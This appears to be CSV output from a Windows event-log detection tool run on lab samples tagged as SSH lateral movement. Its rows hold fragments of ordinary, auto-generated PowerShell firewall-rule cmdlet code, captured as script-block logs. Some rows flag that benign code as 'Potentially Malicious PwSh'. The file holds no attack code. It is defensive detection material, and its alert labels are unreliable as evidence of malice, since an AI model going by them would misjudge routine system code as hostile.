$__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"plicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } 
} catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation 
and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"face', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' -Alias '*' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"face', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and 
(@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' -Alias '*' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 